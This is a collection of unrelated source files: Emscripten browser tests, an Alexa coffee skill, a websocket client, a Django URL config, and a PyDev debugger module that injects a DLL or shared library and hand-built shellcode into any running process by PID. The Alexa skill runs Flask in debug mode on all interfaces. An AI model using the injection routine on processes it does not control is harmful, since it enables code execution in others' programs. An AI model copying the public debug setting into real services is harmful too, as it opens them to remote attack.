self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that it is possible to load two asm.js compiled programs to one page when both --separate-asm and MODULARIZE=1 is used, by assigning
# the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page2.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module2', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage2["asm"]']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
# Tests that it is possible to encapsulate asm.js compiled programs by using --separate-asm + MODULARIZE=1. See
# encapsulated_asmjs_page_load.html for the example.
@no_wasm_backend('this tests asm.js support')
def test_encapsulated_asmjs_page_load(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'encapsulated_asmjs_page_load.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'a.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=EmscriptenCode', '-s', 'SEPARATE_ASM_MODULE_NAME="var EmscriptenCode"']
print(cmd)
subprocess.check_call(cmd)
self.run_browser('main.html', None, '/report_result?1')
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
|
htcpcp-alexa.py
|
import threading
import requests
import pyalexa
import flask
import json
BASE_RESPONSE = {
"version": "1",
"response": {}
}
with open(".keys") as f:
keys = json.load(f)
APP_ID = keys["app_id"]
api = flask.Flask(__name__)
skill = pyalexa.Skill(app_id=APP_ID)
my_drink_id = -1
def do_brew(drink, creams=0, sugar=0):
global my_drink_id
data = {
"size": 6,
"k_cup": "yes please" if drink == "coffee" else "",
"tea_bag": "yes please" if drink == "tea" else "",
"sugar": int(sugar) if sugar else 0,
"creamer": int(creams) if creams else 0,
}
if my_drink_id != -1:
data["id"] = my_drink_id
res = requests.post("http://localhost/api/update/drink", json=data)
res.raise_for_status()
if "id" in res.json():
my_drink_id = res.json()["id"]
requests.post("http://localhost/api/brew/{}/1".format(my_drink_id))
@skill.launch
def launch(request):
return request.response(end=True, speech="Welcome to Breakfast Time! You can ask me to make coffee, with or without sugar and cream.")
@skill.end
def end(request):
return request.response(end=True, speech="Thanks for using Breakfast Time!")
@skill.intent("Brew")
def coffee(request):
creams = request.data().get("Cream", 0)
sugars = request.data().get("Sugar", 0)
drink = request.data().get("Drink", "coffee")
if creams == "?":
return request.response(end=False, speech="You want how much cream!?")
if sugars == "?":
return request.response(end=False, speech="You want how much sugar!?")
threading.Thread(target=do_brew, args=(drink, creams, sugars)).start()
return request.response(end=True, speech="Okay! One {} coming right up!".format(drink))
api.add_url_rule('/', 'pyalexa', skill.flask_target, methods=['POST'])
api.run('0.0.0.0', port=8081, debug=True)
|
add_code_to_python_process.py
|
r'''
Copyright: Brainwy Software Ltda.
License: EPL.
=============
Works for Windows relying on a fork of winappdbg which works in py2/3 (at least for the part we're interested in).
See: https://github.com/fabioz/winappdbg (py3 branch).
Note that the official branch for winappdbg is: https://github.com/MarioVilas/winappdbg, which should be used when it works in Py3.
A private copy is added here to make deployment easier, but changes should always be done upstream first.
Works for Linux relying on gdb.
Limitations:
============
Linux:
------
1. It possible that ptrace is disabled: /etc/sysctl.d/10-ptrace.conf
Note that even enabling it in /etc/sysctl.d/10-ptrace.conf (i.e.: making the
ptrace_scope=0), it's possible that we need to run the application that'll use ptrace (or
gdb in this case) as root (so, we must sudo the python which'll run this module).
2. It currently doesn't work in debug builds (i.e.: python_d)
Other implementations:
- pyrasite.com:
GPL
Windows/linux (in Linux it also uses gdb to connect -- although specifics are different as we use a dll to execute
code with other threads stopped). It's Windows approach is more limited because it doesn't seem to deal properly with
Python 3 if threading is disabled.
- https://github.com/google/pyringe:
Apache v2.
Only linux/Python 2.
- http://pytools.codeplex.com:
Apache V2
Windows Only (but supports mixed mode debugging)
Our own code relies heavily on a part of it: http://pytools.codeplex.com/SourceControl/latest#Python/Product/PyDebugAttach/PyDebugAttach.cpp
to overcome some limitations of attaching and running code in the target python executable on Python 3.
See: attach.cpp
Linux: References if we wanted to use a pure-python debugger:
https://bitbucket.org/haypo/python-ptrace/
http://stackoverflow.com/questions/7841573/how-to-get-an-error-message-for-errno-value-in-python
Jugaad:
https://www.defcon.org/images/defcon-19/dc-19-presentations/Jakhar/DEFCON-19-Jakhar-Jugaad-Linux-Thread-Injection.pdf
https://github.com/aseemjakhar/jugaad
Something else (general and not Python related):
- http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces
Other references:
- https://github.com/haypo/faulthandler
- http://nedbatchelder.com/text/trace-function.html
- https://github.com/python-git/python/blob/master/Python/sysmodule.c (sys_settrace)
- https://github.com/python-git/python/blob/master/Python/ceval.c (PyEval_SetTrace)
- https://github.com/python-git/python/blob/master/Python/thread.c (PyThread_get_key_value)
To build the dlls needed on windows, visual studio express 13 was used (see compile_dll.bat)
See: attach_pydevd.py to attach the pydev debugger to a running python process.
'''
# Note: to work with nasm compiling asm to code and decompiling to see asm with shellcode:
# x:\nasm\nasm-2.07-win32\nasm-2.07\nasm.exe
# nasm.asm&x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe -b arch nasm
import ctypes
import os
import struct
import subprocess
import sys
import time
class AutoExit(object):
def __init__(self, on_exit):
self.on_exit = on_exit
def __enter__(self):
pass
def __exit__(self, *args):
self.on_exit()
class GenShellCodeHelper(object):
def __init__(self, is_64):
from winappdbg import compat
self.is_64 = is_64
self._code = []
if not is_64:
self._translations = {
'push esi': compat.b('\x56'),
'push eax': compat.b('\x50'),
'push ebp': compat.b('\x55'),
'push ebx': compat.b('\x53'),
'pop esi': compat.b('\x5E'),
'pop eax': compat.b('\x58'),
'pop ebp': compat.b('\x5D'),
'pop ebx': compat.b('\x5B'),
'mov esi': compat.b('\xBE'),
'mov eax': compat.b('\xB8'),
'mov ebp': compat.b('\xBD'),
'mov ebx': compat.b('\xBB'),
'call ebp': compat.b('\xFF\xD5'),
'call eax': compat.b('\xFF\xD0'),
'call ebx': compat.b('\xFF\xD3'),
'mov ebx,eax': compat.b('\x89\xC3'),
'mov eax,ebx': compat.b('\x89\xD8'),
'mov ebp,esp': compat.b('\x89\xE5'),
'mov esp,ebp': compat.b('\x89\xEC'),
'push dword': compat.b('\x68'),
'mov ebp,eax': compat.b('\x89\xC5'),
'mov eax,ebp': compat.b('\x89\xE8'),
'ret': compat.b('\xc3'),
}
else:
# Translate 64 bits
self._translations = {
'push rsi': compat.b('\x56'),
'push rax': compat.b('\x50'),
'push rbp': compat.b('\x55'),
'push rbx': compat.b('\x53'),
'push rsp': compat.b('\x54'),
'push rdi': compat.b('\x57'),
'pop rsi': compat.b('\x5E'),
'pop rax': compat.b('\x58'),
'pop rbp': compat.b('\x5D'),
'pop rbx': compat.b('\x5B'),
'pop rsp': compat.b('\x5C'),
'pop rdi': compat.b('\x5F'),
'mov rsi': compat.b('\x48\xBE'),
'mov rax': compat.b('\x48\xB8'),
'mov rbp': compat.b('\x48\xBD'),
'mov rbx': compat.b('\x48\xBB'),
'mov rdi': compat.b('\x48\xBF'),
'mov rcx': compat.b('\x48\xB9'),
'mov rdx': compat.b('\x48\xBA'),
'call rbp': compat.b('\xFF\xD5'),
'call rax': compat.b('\xFF\xD0'),
'call rbx': compat.b('\xFF\xD3'),
'mov rbx,rax': compat.b('\x48\x89\xC3'),
'mov rax,rbx': compat.b('\x48\x89\xD8'),
'mov rbp,rsp': compat.b('\x48\x89\xE5'),
'mov rsp,rbp': compat.b('\x48\x89\xEC'),
'mov rcx,rbp': compat.b('\x48\x89\xE9'),
'mov rbp,rax': compat.b('\x48\x89\xC5'),
'mov rax,rbp': compat.b('\x48\x89\xE8'),
'mov rdi,rbp': compat.b('\x48\x89\xEF'),
'ret': compat.b('\xc3'),
}
def push_addr(self, addr):
self._code.append(self.translate('push dword'))
self._code.append(addr)
def push(self, register):
self._code.append(self.translate('push %s' % register))
return AutoExit(lambda: self.pop(register))
def pop(self, register):
self._code.append(self.translate('pop %s' % register))
def mov_to_register_addr(self, register, addr):
self._code.append(self.translate('mov %s' % register))
self._code.append(addr)
def mov_register_to_from(self, register_to, register_from):
self._code.append(self.translate('mov %s,%s' % (register_to, register_from)))
def call(self, register):
self._code.append(self.translate('call %s' % register))
def preserve_stack(self):
self.mov_register_to_from('ebp', 'esp')
return AutoExit(lambda: self.restore_stack())
def restore_stack(self):
self.mov_register_to_from('esp', 'ebp')
def ret(self):
self._code.append(self.translate('ret'))
def get_code(self):
from winappdbg import compat
return compat.b('').join(self._code)
def translate(self, code):
return self._translations[code]
def pack_address(self, address):
if self.is_64:
return struct.pack('<q', address)
else:
return struct.pack('<L', address)
def convert(self, code):
'''
Note:
If the shellcode starts with '66' controls, it needs to be changed to add [BITS 32] or
[BITS 64] to the start.
To use:
convert("""
55
53
50
BDE97F071E
FFD5
BDD67B071E
FFD5
5D
5B
58
C3
""")
'''
code = code.replace(' ', '')
lines = []
for l in code.splitlines(False):
lines.append(l)
code = ''.join(lines) # Remove new lines
return code.decode('hex')
def resolve_label(process, label):
for i in range(3):
try:
address = process.resolve_label(label)
assert address
return address
except:
try:
process.scan_modules()
except:
pass
if i == 2:
raise
time.sleep(2)
def is_python_64bit():
return (struct.calcsize('P') == 8)
def is_mac():
import platform
return platform.system() == 'Darwin'
def run_python_code_windows(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
from winappdbg import compat
from winappdbg.process import Process
if not isinstance(python_code, compat.bytes):
python_code = compat.b(python_code)
process = Process(pid)
bits = process.get_bits()
is_64 = bits == 64
if is_64 != is_python_64bit():
raise RuntimeError("The architecture of the Python used to connect doesn't match the architecture of the target.\n"
"Target 64 bits: %s\n"
"Current Python 64 bits: %s" % (is_64, is_python_64bit()))
print('Connecting to %s bits target' % (bits,))
assert resolve_label(process, compat.b('PyGILState_Ensure'))
filedir = os.path.dirname(__file__)
if is_64:
suffix = 'amd64'
else:
suffix = 'x86'
target_dll = os.path.join(filedir, 'attach_%s.dll' % suffix)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
print('Injecting dll')
process.inject_dll(target_dll.encode('mbcs'))
print('Dll injected')
process.scan_modules()
attach_func = resolve_label(process, compat.b('AttachAndRunPythonCode'))
assert attach_func
print('Allocating code in target process')
code_address = process.malloc(len(python_code))
assert code_address
print('Writing code in target process')
process.write(code_address, python_code)
print('Allocating return value memory in target process')
return_code_address = process.malloc(ctypes.sizeof(ctypes.c_int))
assert return_code_address
CONNECT_DEBUGGER = 2
startup_info = 0
if show_debug_info:
SHOW_DEBUG_INFO = 1
startup_info |= SHOW_DEBUG_INFO # Uncomment to show debug info
if connect_debugger_tracing:
startup_info |= CONNECT_DEBUGGER
process.write_int(return_code_address, startup_info)
helper = GenShellCodeHelper(is_64)
if is_64:
# Interesting read: http://msdn.microsoft.com/en-us/library/ms235286.aspx
# Overview of x64 Calling Conventions (for windows: Linux is different!)
# Register Usage: http://msdn.microsoft.com/en-us/library/9z1stfyw.aspx
# The registers RAX, RCX, RDX, R8, R9, R10, R11 are considered volatile and must be considered destroyed on function calls (unless otherwise safety-provable by analysis such as whole program optimization).
#
# The registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are considered nonvolatile and must be saved and restored by a function that uses them.
#
# Important: RCX: first int argument
with helper.push('rdi'): # This one REALLY must be pushed/poped
with helper.push('rsp'):
with helper.push('rbp'):
with helper.push('rbx'):
with helper.push('rdi'): # Note: pop is automatic.
helper.mov_to_register_addr('rcx', helper.pack_address(code_address))
helper.mov_to_register_addr('rdx', helper.pack_address(return_code_address))
helper.mov_to_register_addr('rbx', helper.pack_address(attach_func))
helper.call('rbx')
else:
with helper.push('eax'): # Note: pop is automatic.
with helper.push('ebp'):
with helper.push('ebx'):
with helper.preserve_stack():
# Put our code as a parameter in the stack (on x86, we push parameters to
# the stack)
helper.push_addr(helper.pack_address(return_code_address))
helper.push_addr(helper.pack_address(code_address))
helper.mov_to_register_addr('ebx', helper.pack_address(attach_func))
helper.call('ebx')
helper.ret()
code = helper.get_code()
# Uncomment to see the disassembled version of what we just did...
# with open('f.asm', 'wb') as stream:
# stream.write(code)
#
# exe = r'x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe'
# if is_64:
# arch = '64'
# else:
# arch = '32'
#
# subprocess.call((exe + ' -b %s f.asm' % arch).split())
print('Injecting code to target process')
thread, _thread_address = process.inject_code(code, 0)
timeout = None # Could receive timeout in millis.
print('Waiting for code to complete')
thread.wait(timeout)
return_code = process.read_int(return_code_address)
if return_code == 0:
print('Attach finished successfully.')
else:
print('Error when injecting code in target process. Error code: %s (on windows)' % (return_code,))
process.free(thread.pInjectedMemory)
process.free(code_address)
process.free(return_code_address)
return return_code
def run_python_code_linux(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'amd64'
arch = 'i386:x86-64'
else:
suffix = 'x86'
arch = 'i386'
print('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_linux_%s.so' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
gdb_threads_settrace_file = find_helper_script(filedir, 'gdb_threads_settrace.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'gdb',
'--nw', # no gui interface
'--nh', # no ~/.gdbinit
'--nx', # no .gdbinit
# '--quiet', # no version number on startup
'--pid',
str(pid),
'--batch',
# '--batch-silent',
]
cmd.extend(["--eval-command='set scheduler-locking off'"]) # If on we'll deadlock.
cmd.extend(["--eval-command='set architecture %s'" % arch])
cmd.extend([
"--eval-command='call dlopen(\"%s\", 2)'" % target_dll,
"--eval-command='call DoAttach(%s, \"%s\", %s)'" % (
is_debug, python_code, show_debug_info)
])
if connect_debugger_tracing:
cmd.extend([
"--command='%s'" % (gdb_threads_settrace_file,),
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running gdb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
def find_helper_script(filedir, script_name):
lldb_threads_settrace_file = os.path.join(filedir, 'linux', script_name)
lldb_threads_settrace_file = os.path.normpath(lldb_threads_settrace_file)
if not os.path.exists(lldb_threads_settrace_file):
raise RuntimeError('Could not find file to settrace: %s' % lldb_threads_settrace_file)
return lldb_threads_settrace_file
def run_python_code_mac(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'x86_64.dylib'
arch = 'i386:x86-64'
else:
suffix = 'x86.dylib'
arch = 'i386'
print('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_%s' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
lldb_threads_settrace_file = find_helper_script(filedir, 'lldb_threads_settrace.py')
lldb_prepare_file = find_helper_script(filedir, 'lldb_prepare.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'lldb',
'--no-lldbinit', # Do not automatically parse any '.lldbinit' files.
# '--attach-pid',
# str(pid),
# '--arch',
# arch,
'--script-language',
'Python'
# '--batch-silent',
]
cmd.extend([
"-o 'process attach --pid %d'"%pid,
"-o 'command script import \"%s\"'" % (lldb_prepare_file,),
"-o 'load_lib_and_attach \"%s\" %s \"%s\" %s'" % (target_dll,
is_debug, python_code, show_debug_info),
])
if connect_debugger_tracing:
cmd.extend([
# "-o 'expr (int) SetSysTraceFunc(0, 0);'",
"-o 'command script import \"%s\"'" % (lldb_threads_settrace_file,),
])
cmd.extend([
"-o 'process detach'",
"-o 'script import os; os._exit(1)'",
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
print('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print('Running lldb in target process.')
out, err = p.communicate()
print('stdout: %s' % (out,))
print('stderr: %s' % (err,))
return out, err
if sys.platform == 'win32':
run_python_code = run_python_code_windows
elif is_mac():
run_python_code = run_python_code_mac
else:
run_python_code = run_python_code_linux
def test():
print('Running with: %s' % (sys.executable,))
code = '''
import os, time, sys
print(os.getpid())
#from threading import Thread
#Thread(target=str).start()
if __name__ == '__main__':
while True:
time.sleep(.5)
sys.stdout.write('.\\n')
sys.stdout.flush()
'''
p = subprocess.Popen([sys.executable, '-u', '-c', code])
try:
code = 'print("It worked!")\n'
# Real code will be something as:
# code = '''import sys;sys.path.append(r'X:\winappdbg-code\examples'); import imported;'''
run_python_code(p.pid, python_code=code)
time.sleep(3)
finally:
p.kill()
def main(args):
# Otherwise, assume the first parameter is the pid and anything else is code to be executed
# in the target process.
pid = int(args[0])
del args[0]
python_code = ';'.join(args)
# Note: on Linux the python code may not have a single quote char: '
run_python_code(pid, python_code)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print('Expected pid and Python code to execute in target process.')
else:
if '--test' == args[0]:
test()
else:
main(args)
|
ws.py
|
import threading
import websocket
class WSClient:
def __init__(self, url: str, on_message=None, on_open=None, on_close=None, on_error=None):
self.ws = websocket.WebSocketApp(
url,
on_open=self._default_on_open,
on_close=self._default_on_close,
on_error=self._default_on_error,
on_message=self._default_on_message,
)
self._url = url
self._handle_message = on_message
self._handle_open = on_open
self._handle_close = on_close
self._handle_error = on_error
self._run_thread = None
def run(self):
self.ws.run_forever()
def run_async(self):
self._run_thread = threading.Thread(target=self.run)
self._run_thread.start()
def close(self):
self.ws.close()
if self._run_thread:
self._run_thread.join()
def _default_on_message(self, ws, message):
if self._handle_message:
self._handle_message(message)
def _default_on_open(self, ws):
if self._handle_open:
self._handle_open()
def _default_on_close(self, ws, close_status_code, close_msg):
if self._handle_close:
self._handle_close()
def _default_on_error(self, ws, error):
if self._handle_error:
self._handle_error(error)
|
urls.py
|
import os
import threading
from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import TemplateView
from django.contrib.auth.decorators import login_required
from orchestrator.monitoring import file_trigger_monitor, schedule_trigger_monitor, email_imap_trigger_monitor, email_outlook_trigger_monitor, botflow_execution_monitor
def start_file_trigger_monitor():
t = threading.Thread(target=file_trigger_monitor)
t.setDaemon(True)
t.start()
def start_schedule_trigger_monitor():
t = threading.Thread(target=schedule_trigger_monitor)
t.setDaemon(True)
t.start()
def start_email_imap_trigger_monitor():
t = threading.Thread(target=email_imap_trigger_monitor)
t.setDaemon(True)
t.start()
def start_email_outlook_trigger_monitor():
t = threading.Thread(target=email_outlook_trigger_monitor)
t.setDaemon(True)
t.start()
def start_botflow_execution_monitor():
t = threading.Thread(target=botflow_execution_monitor)
t.setDaemon(True)
t.start()
urlpatterns = [
path('api/0/', include('api0.urls')),
path('dashboard/', include('dashboard.urls')),
path('', admin.site.urls),
]
if os.path.exists('logs\\error_log.txt'):
os.remove('logs\\error_log.txt')
if os.path.exists('logs\\error_bot_status.txt'):
os.remove('logs\\error_bot_status.txt')
start_file_trigger_monitor()
start_schedule_trigger_monitor()
